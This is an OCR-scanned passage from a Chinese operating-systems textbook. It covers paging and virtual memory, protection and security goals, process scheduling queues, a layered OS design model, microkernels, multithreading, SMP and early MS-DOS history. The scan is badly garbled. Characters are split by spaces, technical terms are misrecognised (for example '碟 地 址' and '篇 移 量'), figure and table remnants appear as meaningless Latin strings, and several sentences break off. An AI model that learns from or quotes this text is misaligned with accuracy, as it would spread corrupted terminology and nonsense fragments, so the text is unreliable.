虚拟 存储 器 的 构想 是 为 了 满足 有 多 个 用 户 作业 同时 驻 留 在 内 存 中 的 要 求 ， 这 样 ， 当 一 个 进程 被 
写 出 到 辅助 存储 器 中 并 且 后 继 进 程 被 读 人 时 ， 在 连续 的 进程 执行 之 间 将 不 会 脱节 。 由 于 进程 大 
小 不 同 ， 如 果 处 理 器 在 很 多 进程 间 切 换 ， 则 很 难 把 它们 紧密 地 压 人 内 存 中 ， 因 此 引进 了 分 页 系 
统 。 在 分 页 系统 中 ， 进 程 由 许多 固定 大 小 的 块 组 成 ， 这 些 块 称 做 页 。 程 序 通过 虚 地 址 〔 virtual 
address) 访问 字 ， 碟 地 址 由 页 号 和 页 中 的 篇 移 量 组 成 。 进 程 的 每 一 页 都 可 以 放置 在 内 存 中 的 任 
何 地 方 ， 分 页 系统 提供 了 程序 中 使 用 的 虚 地 址 和 内 存 中 的 实地 址 (real address’) 或 物理 地 址 之 
间 的 动态 映射 。 

有 了 动态 映射 硬件 , 下 一 逻辑 步骤 是 消除 一 个 进程 的 所 有 页 同时 驻 留 在 内 存 中 的 要 求 。 一 个 
进程 的 所 有 页 都 保留 在 磁盘 中 ， 当 进程 执行 时 , 一 部 分 页 在 内 存 中 。 如 果 和 需要 访问 的 某 一 页 不 在 
内 存 中 ， 存 储 管理 硬件 可 以 检测 到 ， 然 后 安排 载 人 这 个 缺 页。 这 个 配置 称 做 虚拟 内 存 ， 如 图 2.9 
所 示 。 










1E eg | 
SE BREE 


E- CSE- | 


EANAN SRE- 


A 





i 
Sen E 
PELAS 








PETH 
TE 
T 


磁盘 

内 存 包含 许多 长 度 因 MF ER 可 以 保存 许多 
定 的 帧 , 其 长 度 与 页 的 大 长 度 固 定 的 页 。 一 个 用 户 程序 
小 相等 .对 一 个 要 执行 的 由 很 多 页 组 成 。 所 有 程序 连 疗 
程序 , 它 的 一 些 页 或 所 有 操作 系统 的 页 都 以 文件 的 形式 
页 必须 在 内 存 中 保存 在 磁盘 中 


图 2.9 虚拟 存储 器 概念 图 2.10 虚拟 存储 器 寻 址 


处 理 器 硬件 和 操作 系统 一 起 提供 给 用 户 “虚拟 处 理 器 ”的 概念 ， 而 “虚拟 处 理 器 ”有 对 坦 执 
存储 器 的 访问 权 。 这 个 存储 器 可 以 是 一 个 线性 地 址 空间 ,也 可 以 是 段 的 集合 ,而 段 是 可 变 长 度 的 
连续 地 址 块 。 不 论 娜 种 情况 ， 程 序 设计 语言 的 指令 都 可 以 访问 宕 拟 存储 器 区 域 中 的 程序 半数 据 。 
可 以 通过 给 每 个 进程 一 个 唯一 的 不 重 全 的 虚拟 存 备 器 空间 米 实 现 进程 隔离 ;可 以 送 过 使 两 个 虚拟 
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FF A ae 2 [i] BY) — BBS} BB SLA SES ; 文件 可 用 于 长 期 存储 , 文件 或 其 中 一 部 分 可 以 复制 到 
虚拟 存储 器 中 供 程 序 操作 。 

图 2.10 显示 了 虚拟 存储 器 方案 中 的 寻 址 关系 。 存 储 器 由 内 存 和 低速 的 辅助 存储 器 组 成 ， 内 
存 可 直接 访问 到 (通过 机 器 指令 ), 外 存 则 可 以 通过 把 块 载 人 内 存 间接 访问 到 。 地 址 转换 硬件 ( 映 
射 器 ) 位 于 处 理 器 和 内 存 之 间 。 程 序 使 用 虚 地 址 访问 ， 虚 地 址 将 映射 成 真实 的 内 存 地 址 。 如 果 访 
问 的 虚 地 址 不 在 实际 内 存 中 ,实际 内 存 中 的 一 部 分 内 容 将 换 到 外 存 中 ,然后 换 人 所 需要 的 数据 块 。 
在 这 个 活动 过 程 中 , 产生 这 个 地 址 访问 的 进程 必须 被 挂 起 。 操作 系统 设计 者 的 任务 是 开发 开销 很 
少 的 地 址 转换 机 制 ， 以 及 可 以 减 小 各 级 存储 器 级 间 交 换 量 的 存储 分 配 策略 。 


2.3.3 信息 保护 和 安全 


信息 保护 是 在 使 用 分 时 系统 时 提出 的 ,近年 来 计算 机 网 络 进一步 关注 和 发 展 了 这 个 问题 。 由 于 
环境 不 同 ， 涉 及 一 个 组 织 的 威胁 的 本 质 也 不 同 。 但 是 ， 有 一 些 通用 工具 可 以 嵌 和 人 支持 各 种 保护 和 安 
全 机 制 的 计算 机 和 操作 系统 内 部 。 总 之 ， 我 们 关心 对 计算 机 系统 的 控制 访问 和 其 中 保存 的 信息 。 

大 多 数 与 操作 系统 相关 的 安全 和 保护 问题 可 以 分 为 4 类 : 

@ 可 用 性 : 保护 系统 不 被 打 断 。 

o 保密 性 ， 保证 用 户 不 能 读 到 未 授权 访问 的 数据 。 

o 数据 完整 性 : 保护 数据 不 被 未 授权 修改 。 

e 认证 : 涉及 用 户 身份 的 正确 认证 和 消息 或 数据 的 合法 性 。 
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操作 系统 的 一 个 关键 任务 是 管理 各 种 可 用 资源 ( 内 存 空 间 、LO 设备 、 处 理 器 )， 并 调度 各 
种 活动 进程 使 用 这 些 资 源 。 任 何 资源 分 配 和 调度 策略 都 必须 考虑 三 个 因素 : 
@ 公平 性 : 通常 希望 给 竞争 使 用 某 一 特定 资源 的 所 有 进程 提供 几乎 相等 和 公平 的 访问 机 
会 。 对 同一 类 作业 ， 也 就 是 说 有 类 似 请 求 的 作业 ， 更 是 需要 如 此 。 
e 有 差别 的 响应 性 : 另 一 方面 ， 操 作 系 统 可 能 需要 区 分 有 不 同 服务 要 求 的 不 同 作 业 类 。 操 
作 系 统 将 试图 做 出 满足 所 有 要 求 的 分 配 和 调度 决策 ， 并 且 动 态 地 做 出 决策 。 例 如 ， 如 果 
一 个 进程 正在 等 待 使 用 一 个 VO 设备 ， 操 作 系 统 会 尽 可 能 迅速 地 调度 这 个 进程 ， 从 而 释 
放 这 个 设备 以 方便 其 他 进程 使 用 。 
o 有 效 性 ;操作 系统 希望 获得 最 大 的 吞吐 量 和 最 小 的 响应 时 间 ， 并 且 在 分 时 的 情况 下 ， 能 
够 容纳 尽 可 能 多 的 用 户 。 这 些 标准 互相 了 矛盾， 在 给 定 状 态 下 寻找 适当 的 平衡 是 操作 系统 
中 一 个 正在 进行 研究 的 问题 。 
调度 和 资源 管理 任务 是 一 个 基本 的 操作 系统 研究 问题 ， 并 且 可 以 应 用 数学 研究 成 果 。 此 外 ， 
系统 活动 的 度量 对 监视 性 能 并 进行 调节 是 非常 重要 的 。 
图 2.11 给 出 了 多 道 程序 设计 环境 中 涉及 进程 调度 和 资源 分 配 的 操作 系统 主要 组 件 。 操 作 系 
统 中 维护 着 多 个 队列 ,每 个 队列 代表 等 待 某 些 资源 的 进程 的 简单 列表 。 短 期 队列 由 在 内 存 中 (或 
至 少 最 基本 的 一 小 部 分 在 内 存 中 ) 并 等 待 处 理 器 可 用 时 随时 准备 运行 的 进程 组 成 。 任何 一 个 这 样 
的 进程 都 可 以 在 下 一 步 使 用 处 理 器 ， 究 竟 选 择 哪 一 个 取决 于 短期 调度 器 ， 或 者 称 为 分 派 器 
( dispatcher )。 一 个 常用 的 策略 是 依次 给 队列 中 的 每 个 进程 一 定 的 时 间 ， 这 称 为 时 间 片 轮转 
(round-robin) 技术 ， 时 间 片 轮转 技术 使 用 了 一 个 环形 队列 。 另 一 种 策略 是 给 不 同 的 进程 分 配 不 
同 的 优先 级 ， 根 据 优 先 级 进行 调度 。 
长 期 队列 是 等 待 使 用 处 理 器 的 新 作业 的 列表 。 操 作 系 统 通过 把 长 期 队列 中 的 作业 转移 到 短期 
队列 中 ,实现 往 系统 中 添加 作业 ,这 时 内 存 的 一 部 分 必须 分 配给 新 到 来 的 作业 。 因 此 ,操作 系统 
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要 避免 由 于 允许 太 多 的 进程 进入 系统 而 过 量 使 用 内 存 或 处 理 时 间 。 每 个 VO 设备 都 有 一 个 VO 队 
列 , 可 能 有 多 个 进程 请 求 使 用 同一 个 IO 设备 。 所 有 等 待 使 用 一 个 设备 的 进程 在 该 设备 的 队列 中 
排队 ， 同 时 操作 系统 必须 决定 把 可 用 的 IO 设备 分 配给 哪 一 个 进程 。 

如 果 发 生 了 一 个 中 断 , 则 操作 系统 在 中 断 处 理 程序 入 口 得 到 处 理 器 的 控制 权 。 进程 可 以 通过 
服务 调用 明确 地 请 求 某 些 操作 系统 的 服务 , 如 IO 设备 处 理 服务 。 在 这 种 情况 下 ， 服 务 调用 处 理 
程序 是 操作 系统 的 人 口 点 。 在 任何 情况 下 ,只 要 处 理 中 断 或 服务 调用 ， 就 会 请 求 短 期 调度 器 选择 
一 个 进程 执行 。 

前 面 所 述 的 是 一 个 功能 描述 , 关于 操作 系统 这 部 分 的 细节 和 模块 化 的 设计 , 在 各 种 系统 中 各 
不 相同 。 操作 系统 中 这 方面 的 研究 大 多 针对 选择 算法 和 数据 结构 , 其 目的 是 提供 公平 性 、 有 差别 
的 响应 性 和 有 效 性 。 


长 期 ”短期 ”VO 
队列 ”队列 ”队列 





控制 传递 给 进程 
图 2.11 用 于 多 道 程序 设计 的 操作 系统 的 主要 组 件 


2.3.5 ”系统 结构 


随 着 操作 系统 中 增加 了 越 来 越 多 的 功能 , 并 且 底 层 硬件 变 得 更 强大 、 更 加 通用 , 导致 操作 系 
统 的 大 小 和 复杂 性 也 随 着 增加 。MIT 在 1963 年 投入 使 用 的 CTSS， 大 约 包含 32 000 个 36 位 字 ; 
一 年 后 ,IBM 开发 的 OS/360 有 超过 100 万 条 的 机 器 指令 ;1975 年 MIT 和 Bell 实 验 室 开 发 的 Multics 
系统 增长 到 了 2000 万 条 机 器 指 令 。 近 年 来 ,确实 也 针对 一 些小 型 系统 引入 过 比较 简单 的 操作 系 
统 ， 但 是 随 着 底层 硬件 和 用 户 需 求 的 增长 ， 它 们 也 不 可 避免 地 变 得 越 来 越 复杂 。 因 此 .当今 的 
UNIX 系统 要 比 那 些 天 才 的 程序 员 在 20 世纪 70 年 代 早 期 开发 的 那个 小 系统 复杂 得 多 , 而 简单 的 
MS-DOS 让 位 于 具有 更 多 更 复杂 能 力 的 OS/2 和 Windows 操作 系统 。 例 如 ，Windows NT 4.0 包含 
1 600 万 行 代码 ， 而 Windows 2000 的 代码 量 则 超过 这 个 数目 的 两 倍 。 

一 个 功能 完善 的 操作 系统 的 大 小 和 它 所 处 理 的 任务 的 困难 性 ,导致 了 4 个 让 人 遗 乌 但 又 普遍 
存在 的 问题 。 第 一 , 操作 系统 在 交付 使 用 时 就 习惯 性 地 表现 出 落后 , 这 就 要 求 有 新 的 操作 系统 或 
升级 老 的 系统 。 第 二 ， 随 着 时 间 的 推移 会 发 现 越 来 越 多 潜在 的 缺陷 ,这些 缺陷 必须 及 时 修复 。 第 
=, 总 是 难以 达到 期 望 的 性 能 。 第 四 , 理论 表明 , 不 可 能 开发 出 既 复 杂 的 又 不 易 受 各 种 包括 病毒 、 
蠕虫 和 未 授权 访问 之 类 的 安全 性 攻击 的 操作 系统 。 

为 管理 操作 系统 的 复杂 性 并 克服 这 些 问题 , 多 年 来 操作 系统 的 软件 结构 得 到 广泛 的 重视 。 有 
几 点 是 显而易见 的 : 软件 必须 是 模块 化 的 , 这 有 助 于 组 织 软 件 开 发 过 程 、 限 定 诊断 范围 和 修正 错 
误 ;模块 相互 之 间 必 须 有 定义 很 好 的 接口 , 接口 必须 尽 可 能 简单 , 这 不 但 可 以 简化 程序 设计 在 务 ， 
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还 可 以 使 系统 的 扩展 更 加 容易 。 Re ener HARET, 对 其 他 模块 的 
影响 可 以 减 到 最 小 。 

对 于 运行 数 百 万 到 数 千 万 条 代码 的 大 型 操作 系统 , 仅仅 有 模块 化 程序 设计 是 不 够 的 , 软件 体 
系 结构 和 信息 抽象 的 概念 正 得 到 越 来 越 广泛 的 使 用 。 现代 操作 系统 的 层次 结构 按照 复杂 性 、 时 间 
刻度 、 抽 象 级 进行 功能 划分 。 我 们 可 以 把 系统 看 做 是 一 系列 的 层 。 每 一 层 执 行 操作 系统 所 需 功 能 
的 相关 子 集 。 它 依赖 于 下 一 个 较 低 层 , 较 低 层 执行 更 为 原始 的 功能 并 隐藏 这 些 功能 的 细节 。 它 还 
给 相 邻 的 较 高 层 提供 服务 。 在 理想 情况 下 ， 可 以 通过 定义 层 使 得 改变 一 层 时 不 需要 改变 其 他 层 。 
因此 我 们 把 一 个 问题 分 解 成 几 个 更 易于 处 理 的 子 问题 。 

通常 情况 下 , 较 低层 的 处 理 时 间 很 短 。 操 作 系 统 的 某 些 部 分 必须 直接 与 计算 机 硬件 交互 ,这 
E, 事件 的 时 间 刻 度 仅 为 几 十 亿 分 之 一 秒 。 而 另 一 端 , 操作 系统 的 某 些 功能 直接 与 用 户 交 互 , 用 
户 发 出 命令 的 频率 则 要 小 得 多 , 可 能 每 隔 几 秒 钟 发 一 次 命令 。 使 用 层次 结构 可 以 很 好 地 与 这 种 频 
率 差 别 场 景 保持 一 致 。 

这 些 原理 的 应 用 方式 在 不 同 的 操作 系统 中 有 很 大 的 不 同 。 但 是 , 为 了 获得 操作 系统 的 一 个 概 
观 ， 这 里 给 出 一 个 层次 操作 系统 模型 是 很 有 用 的 。 让 我 们 来 看 一 下 [BROW84 ] 和 [ DENNS4] 
中 提出 的 模型 , 尽管 该 模型 没有 对 应 于 特定 的 操作 系统 , 但 它 提供 了 一 个 从 高 层 来 看 待 操 作 系 统 
结构 的 视角 。 模 型 的 定义 见 表 2.4， 由 下 面 几 层 组 成 : 


表 2.4 操作 系统 设计 层次 
















shell 语言 中 的 语句 
退出 、 终 止 、 挂 起 和 恢复 

创建 、 销 毁 、 连 接 、 分 离 、 查 找 和 列表 
打开 、 关 闭 、 读 和 写 

创建 、 销 毁 、 打 开 、 关 闭 、 读 和 写 

、 打 开 、 关 闭 、 读 和 写 





读 、 写 、 分 配 和 空 亲 
挂 起 、 恢 复 、 等 待 和 发 信号 
ed ae 

| 标记 栈 、 调 用 、 返 回 ， ! 

加 载 、 保 存 、 加 操作 、 减 操作 、 转 移 
| 清空、 传送、 激活 、 求 反 





HER, 微 程序 解释 器 、 标量 和 数组 数据 
寄存 器 、 门 、 总 线 等 





注 : 表 影 部 分 表示 硬件 。 


@ 第 1 层 : 由 电路 组 成 ， 处 理 的 对 象 是 寄存 器 、 存 储 单元 和 届 辑 门 。 定 义 在 这 些 对 象 上 的 
操作 是 动作 ， 如 清空 寄存 器 或 读 取 存 储 单元 。 
© 第 2 层 : 处 理 器 指令 集合 。 该 层 定义 的 操作 是 机 器 语言 指令 集合 允许 的 操作 ， 如 加 、 减 、 
加 载 和 保存 。 
o 第 3 层 : 增加 了 过 程 或 子 程序 的 概念 ， 以 及 调用 /返回 操作 。 
o 第 4 层 : 引入 了 中 断 ， 能 导致 处 理 器 保存 当前 环境 、 调 用 中 断 处 理 程 序 。 
前 面 这 4 层 并 不 是 操作 系统 的 一 部 分 , 而 是 构成 了 处 理 器 的 硬件 。 但是, 操作 系统 的 一 些 元 
素 开 始 在 这 些 层 出 现 ， 如 中 断 处 理 程序 。 从 第 5 层 开始 ， SST ERE So 
多 道 程 序 设计 相关 的 概念 。 
@ 第 5 层 : 在 这 一 TATIANA, ARRAN. MEERES EEN 
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基本 要 求 包括 挂 起 和 恢复 进程 的 能 力 ， 这 就 要 求 保存 硬件 寄存 器 ， 使 得 可 以 从 一 个 进程 
切换 到 另 一 个 。 此 外 ， 如 果 进 程 需要 合作 ， 则 需要 一 些 同步 方法 。 操 作 系统 设计 中 一 个 
最 简单 的 技术 和 重要 的 概念 是 信号 量 ， 简 单 信号 机 制 将 在 第 5 章 讲述 。 
o 第 6 层 : 处 理 计算 机 的 辅助 存储 设备 。 在 这 一 层 出 现 了 定位 读 / 写 头 和 实际 传送 数据 块 的 
功能 。 第 6 层 依赖 于 第 5 层 对 操作 的 调度 和 当 -一 个 操作 完成 后 通知 等 待 进程 该 操作 已 完 
成 的 能 力 。 更 高 层 涉及 对 磁盘 中 所 需 数据 的 寻 址 ， 并 向 第 5 层 中 的 设备 驱动 程序 请 求 相 
应 的 块 。 
® 第 7 层 : 为 进程 创建 一 个 逻辑 地 址 空间 。 这 一 层 把 虚 地 址 空间 组 织 成 块 ， 可 以 在 内 存 和 
外 存 之 间 移 动 。 比 较 常用 的 有 三 个 方案 : 使 用 固定 大 小 的 页 、 使 用 可 变 长 度 的 段 或 两 者 
都 用 。 当 所 需要 的 块 不 在 内 存 中 时 ， 这 一 层 的 逻辑 将 请 求 第 6 层 的 传送 。 

至 此 ,操作 系统 处 理 的 都 是 单 处 理 器 的 资源 。 从 第 8 层 开始 , 操作 系统 处 理 外 部 对 象 ， 如 外 
围 设备 、 网 络 和 网 络 中 的 计算 机 。 这些 位 于 高 层 的 对 象 都 是 逻辑 对 象 ， 命名 对 象 可 以 在 同一 台 计 
算 机 或 在 多 台 计 算 机 间 共享 。 

o 第 8 层 处理 进程 间 的 信息 和 消息 通信 。 尽 管 第 5 层 提供 了 一 个 原始 的 信号 机 制 ， 用 于 

进程 间 的 同步 ， 但 这 一 层 处 理 更 丰富 的 信息 共享 。 用 于 此 目的 的 最 强大 的 工具 之 一 是 管 
道 ( pipe )， 它 是 为 进程 间 的 数据 流 提 供 的 一 个 逻辑 通道 。 一 个 管道 定义 成 它 的 输出 来 自 
一 个 进程 ,而 它 的 输入 是 到 另 一 个 进程 中 去 。 它 还 可 用 于 把 外 部 设备 或 文件 链接 到 进程。 
这 个 概念 将 在 第 6 章 中 讲述 。 

@ 第 9 层 : 支持 称 为 文件 的 长 期 存储 。 在 这 一 层 ， 辅助 存储 器 中 的 数据 可 以 看 做 是 一 个 抽 
象 的 可 变 长 度 的 实体 。 这 与 第 6 层 辅助 存储 器 中 面向 硬件 的 磁道 、 簇 和 固定 大 小 的 块 形 
成 对 比 。 

o 第 10 层 :提供 访问 外 部 设备 的 标准 接口 。 

© 第 11 层 : 负责 维护 系统 资源 和 对 象 的 外 部 标识 符 与 内 部 标识 符 间 的 关联 。 外 部 标识 符 是 
应 用 程序 和 用 户 使 用 的 名 字 ;， 内 部 标识 符 是 一 个 地 址 或 可 被 操作 系统 低层 使 用 、 用 于 定 
位 和 控制 一 个 对 象 的 其 他 指示 符 。 这 些 关联 在 目录 中 维护 ， 目 录 项 不 仅 包括 外 部 /内 部 映 
St. 而 且 包 括 诸如 访问 权 之 类 的 特性 。 

o 第 12 层 :提供 了 一 个 支持 进程 的 功能 完善 的 软件 设施 ,这 和 第 5 层 中 所 提供 的 大 不 相同 。 
第 5 层 只 维护 与 进程 相关 的 处 理 器 寄存 器 内 容 和 用 于 调度 进程 的 逻辑 , 而 第 12 层 支 持 进 
程 管理 所 需 的 全 部 信息 ， 这 包括 进程 的 虚 地 址 空间 、 可 能 与 进程 发 生 交互 的 对 象 和 进程 
的 列表 以 及 对 交互 的 约束 、 在 进程 创建 后 传递 给 进程 的 参数 和 操作 系统 在 控制 进程 时 可 
能 用 到 的 其 他 特性 。 

@ 第 13 层 ， 为 用 户 提供 操作 系统 的 一 个 界面 。 它 之 所 以 称 做 命令 行 解释 器 ( shell )， 是 因 
为 它 将 用 户 和 操作 系统 细节 分 离开 ， 而 简单 地 把 操作 系统 作为 一 组 服务 的 集合 提供 给 用 
户 。 命 令 行 解释 器 接受 用 户 命令 或 作业 控制 语句 ， 对 它们 进行 解释 ， 并 在 需要 时 创建 和 
控制 进程 。 例 如 ， 这 一 层 的 界面 可 以 用 图 形 方式 实现 ， 即 通过 菜单 提供 用 户 可 以 使 用 的 
命令 ， 并 输出 结果 到 一 个 特殊 设备 ( 如 显示 器 ) KER 

这 个 操作 系统 的 假设 模型 提供 了 一 个 有 用 的 可 描述 结构 ,可 以 用 作 实 现 操作 系统 的 指南 。 在 
本 书后 面 讲述 某 个 特定 的 设计 问题 时 ， 可 返回 参考 此 结构 。 


2.4 现代 操作 系统 的 特征 


在 过 去 数 年 中 , 操作 系统 的 结构 和 功能 得 到 逐步 发 展 。 但 是 近年 来 , 许多 新 的 设计 要 素 引 入 
到 新 操作 系统 以 及 现 有 操作 系统 的 新 版 本 中 , 使 操作 系统 产生 了 本 质 性 的 变化 。 这 些 现代 操作 系 
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统 针 对 硬件 中 的 新 发 展 、 新 的 应 用 程序 和 新 的 安全 威胁 。 促 使 操作 系统 发 展 的 硬件 因素 主要 有 : 
包含 多 处 理 器 的 计算 机 系统 、 高 速 增 长 的 机 器 速度 、 高 速 网 络 连接 和 容量 不 断 增加 的 各 种 存储 设 
备 。 多 媒体 应 用 、Internet 和 Web 访问 、 客 户 /服务 器 计算 等 应 用 领域 也 影响 着 操作 系统 的 设计 。 
在 安全 性 方面 , 互联 网 的 访问 增加 了 潜在 的 威胁 和 更 加 复杂 的 攻击 , 例如 病毒 、 蠕 虫 和 黑客 技术 ， 
这 些 都 对 操作 系统 的 设计 产生 了 深远 的 影响 。 

对 操作 系统 要 求 上 的 变化 速度 之 快 不 仅 需 要 修改 和 增强 现 有 的 操作 系统 体系 结构 ,而 且 需 要 
有 新 的 操作 系统 组 织 方法 。 在 实验 用 和 商用 操作 系统 中 有 很 多 不 同 的 方法 和 设计 要 素 , 大 致 可 以 
分 为 : 微 内 核 体 系 结构 、 多 线程 、 对 称 多 处 理 、 分 布 式 操作 系统 、 面 向 对 象 设 计 。 

至 今 ， 大 多 数 操 作 系 统 都 有 一 个 单 体 内 核 ( monolithic kernel )， 大 多 数 认为 是 操作 系统 应 该 
提供 的 功能 由 这 些 大 内 核 提 供 ， 包 括 调度 、 文 件 系统 、 网 络 、 设 备 驱动 器 、 存 储 管 理 等 。 典 型 情 
AF, 这 个 大 内 核 是 作为 一 个 进程 实现 的 , 所 有 元 素 都 共享 相同 的 地 址 空间 。 微 内 核 体系 结构 只 
给 内 核 分 配 一 些 最 基本 的 功能 ,包括 地 址 空间 、 进 程 间 通信 ( InterProcess Communication, fal R 
IPC) 和 基本 的 调度 。 其 他 的 操作 系统 服务 都 是 由 运行 在 用 户 态 下 且 与 其 他 应 用 程序 类 似 的 进程 
提供 , 这 些 进程 可 根据 特定 的 应 用 和 环境 需求 进行 定制 , 有 时 也 称 这 些 进 程 为 服务 器 。 这 种 方法 
把 内 核 和 服务 程序 的 开发 分 离开 , 可 以 为 特定 的 应 用 程序 或 环境 要 求 定 制服 务 程序 。 微 内 核 方 法 
可 以 使 系统 结构 的 设计 更 加 简单 、 灵 活 ， 很 适合 于 分 布 式 环境 。 实质 上 , 微 内 核 可 以 以 相同 的 方 
式 与 本 地 和 远程 的 服务 进程 交互 ， 使 分 布 式 系统 的 构造 更 为 方便 。 

多 线程 技术 是 指 把 执行 一 个 应 用 程序 的 进程 划分 成 可 以 同时 运行 的 多 个 线程 。 线 程 和 进程 有 
以 下 差别 ， 

o 线程 :可 分 派 的 工作 单元 。 它 包括 处 理 器 上 下 文 环境 (包含 程序 计数 器 和 栈 指针 ) 和 栈 

中 自己 的 数据 区 域 ( 为 允许 子 程序 分 支 )。 线程 顺序 执行 ， 并且 是 可 中 断 的 ， 这样 处 理 器 
可 以 转 到 另 一 个 线程 。 

@ 进程 ;一 个 或 多 个 线程 和 相关 系统 资源 ( 如 包含 数据 和 代码 的 存储 器 空间 、 打 开 的 文件 
和 设备 ) 的 集合 。 这 紧密 对 应 于 一 个 正在 执行 的 程序 的 概念 。 通 过 把 一 个 应 用 程序 分 解 
成 多 个 线程 ， 程 序 员 可 以 在 很 大 程度 上 控制 应 用 程序 的 模块 性 和 应 用 程序 相关 事件 的 时 
间 安 排 。 

多 线程 对 执行 许多 本 质 上 独立 、 不 需要 串 行 处 理 的 应 用 程序 是 很 有 用 的 , 例如 监听 和 处 理 很 
多 客户 请 求 的 数据 库 服务 器 。 在 同一 个 进程 中 运行 多 个 线程 , 在 线程 间 来 回 切换 所 涉及 的 处 理 器 
开销 要 比 在 不 同 进 程 间 进 行 切换 的 开销 少 。 线程 对 构造 进程 是 非常 有 用 的 , 进程 作为 操作 系统 内 
核 的 一 部 分 ， 将 在 第 3 章 中 讲述 。 

到 现在 为 止 , 大 多 数 单 用 户 的 个 人 计算 机 和 工作 站 基本 上 都 只 包含 一 个 通用 的 微 处 理 器 。 随 
着 性 能 要 求 的 不 断 增加 以 及 微 处 理 器 价格 的 不 断 降低 ,计算 机 厂商 引进 了 拥有 多 个 微 处 理 器 的 计 
算 机 。 为 实现 更 高 的 有 效 性 和 可 靠 性 ， 可 使 用 对 称 多 处 理 ( Symmetric MultiProcessing, SMP ) 
技术 。 对 称 多 处 理 不 仅 指 计算 机 硬件 结构 , 而 且 指 反映 该 硬件 结构 的 操作 系统 行为 。 对 称 多 处 理 
计算 机 可 以 定义 为 具有 以 下 特征 的 一 个 独立 的 计算 机 系统 : 

1) 有 多 个 处 理 器 。 

2) 这 些 处 理 器 共享 同一 个 内 存 和 LO 设备 ,它们 之 间 通 过 通信 总 线 或 别 的 内 部 连接 方案 互 

相连 接 。 

3 ) 所 有 处 理 器 都 可 以 执行 相同 的 功能 (因此 称 为 对 称 )。 

近年 来 ,在 单 芯 片上 的 多 处 理 器 系统 (也 称 为 单 片 多 处 理 器 系统 ) 已 经 开始 广泛 应 用 。 无 论 
是 单 片 多 处 理 器 还 是 多 片 对 称 多 处 理 器 ( SMP )， 许 多 设计 要 点 是 一 样 的 。 

对 称 多 处 理 操作 系统 可 调度 进程 或 线程 到 所 有 的 处 理 器 运行 。 对 称 多 处 理 嘎 结构 比 单 处 理 呵 
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结构 具有 更 多 的 潜在 优势 ， 如 下 所 示 
@ 性 能 : 如 果 计 算 机 完成 的 工作 可 组 织 为 让 一 部 分 工作 可 以 并 行 完成 ， 那 么 有 多 个 处 理 器 
的 系统 将 比 只 有 一 个 同类 型 处 理 器 的 系统 产生 更 好 的 人 性能, 如 图 2.12 所 示 。 对 多 道 程序 
设计 而 言 ， 一 次 只 能 执行 一 个 
进程 ， 此 时 所 有 别 的 进程 都 在 。 进程 
等 待 处 理 器 。 对 多 处 理 系统 而 进程 2 
言 ， 多 个 进程 可 以 分 别 在 不 同 
的 处 理 器 上 同时 运行 。 a) 交错 多 道 程序 设计 ， 单 处 理 器 ) 
@ 可 用 性 : 在 对 称 多 处 理 计算 机 进程 — eee EEE 
中 ,由 于 所 有 的 处 理 器 都 可 以 执 
行 相同 的 功能 ,因而 单个 处 理 器 EES 
的 失败 并 不 会 使 机 器 停止 。 相 mi | 一 运行 
反 , 系统 可 以 继续 运行 , 只 是 性 
能 有 所 降低 。 图 2.12 多 道 程序 设计 和 多 道 处 理 
@ 增 量 增长 : 用 户 可 以 通过 添加 额外 的 处 理 器 来 增强 系统 的 功能 。 
o 可 扩展 性 ， 生产 商 可 以 根据 系统 配置 的 处 理 器 的 数量 ， 提 供 一 系列 不 同 价格 和 性 能 特征 
的 产品 。 
特别 需要 注意 的 是 , 这 些 只 是 潜在 的 优点 ， 而 不 是 确定 的 。 操 作 系 统 必 须 提 供 发 掘 对 称 多 处 理 计 
算 机 系统 中 并 行 性 的 工具 和 功能 。 
多 线程 和 对 称 多 处 理 总 是 被 放 在 一 起 讨论 , 但 它们 是 两 个 独立 的 概念 。 即 使 在 单 处 理 器 机 器 
+, 多 线程 对 结构 化 的 应 用 程序 和 内 核 进程 也 是 很 有 用 的 。 由 于 多 个 处 理 器 可 以 并 行 运行 多 个 进 
程 ， 因 而 对 称 多 处 理 计 算 机 对 非 线程 化 的 进程 也 是 有 用 的 。 但 是 , 这 两 个 设施 是 互补 的 , 一 起 使 
用 将 会 更 有 效 。 
对 称 多 处 理 技 术 一 个 很 具有 吸引 力 的 特征 是 多 处 理 器 的 存在 对 用 户 是 透明 的 。 操 作 系 统 负责 
在 多 个 处 理 器 中 调度 线程 或 进程 , 并 且 负 责 处 理 器 间 的 同步 。 本 书 讲述 了 给 用 户 提供 单 系统 外 部 
特征 的 调度 和 同步 机 制 。 另外 一 个 不 同 的 问题 是 给 一 群 计算 机 (多 机 系统 ) 提 供 单 系统 外 部 特征 。 
在 这 种 情况 下 ， 需 要 处 理 的 是 一 群 实体 (计算 机 )， 每 一 个 都 有 自己 的 内 存 、 外 存 和 其 他 WO 模 
H, 分 布 式 操作 系统 使 用 户 产生 错觉 , 使 多 机 系统 好 像 具 有 一 个 单一 的 内 存 空间 、 外 存 空间 以 及 
其 他 的 统一 存 取 措施 ,如 分 布 式 文件 系统 。 尽 管 集群 正 变 得 越 来 越 流 行 , 市场 上 也 有 很 多 集群 产 
m, 但 是 ,分 布 式 操 作 系统 的 技术 发 展 水 平 落后 于 单 处 理 器 操作 系统 和 对 称 多 处 理 操作 系统 。 我 
们 将 在 第 八 部 分 分 析 这 类 系统 。 
操作 系统 设计 的 另 一 个 改革 是 使 用 面向 对 象 技 术 。 面 向 对 象 设计 的 原理 用 于 给 小 内 核 增加 模 
块 化 的 扩展 上 。 在 操作 系统 一 级 ,基于 对 象 的 结构 使 程序 员 可 以 定制 操作 系统 ， 而 不 会 破坏 系统 
的 完整 性 。 面 向 对 象 技术 还 使 得 分 布 式 工具 和 分 布 式 操作 系统 的 开发 变 得 更 容易 。 


2.5 ”微软 的 Windows 概述 


2.5.1 历史 


Windows 的 故事 从 一 个 完全 不 同 的 操作 系统 开始 ,这 个 操作 系统 是 由 微软 公司 为 第 一 台 IBM 
个 人 计算 机 开发 的 , 称 为 MS-DOS 或 者 PC-DOS。 最 初 的 版 本 DOS 1.0 是 在 1981 年 SARAH, 
Èh 4000 行 汇 编 语 言 源 代码 组 成 ， 使 用 Intel 8086 微 处 理 器 运行 在 8KB 的 内 存 中 。 . 

当 IBM 研制 基于 硬盘 的 个 人 计算 机 PC XT 时 , 微软 公司 在 1983 年 发 布 了 DOS 2.0, EAT 
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对 硬盘 的 支持 ， 并 提供 了 层次 目录 。 在 此 之 前 ， 磁 盘 只 能 包含 一 个 目录 ， 最 多 支持 64 个 文件 。 
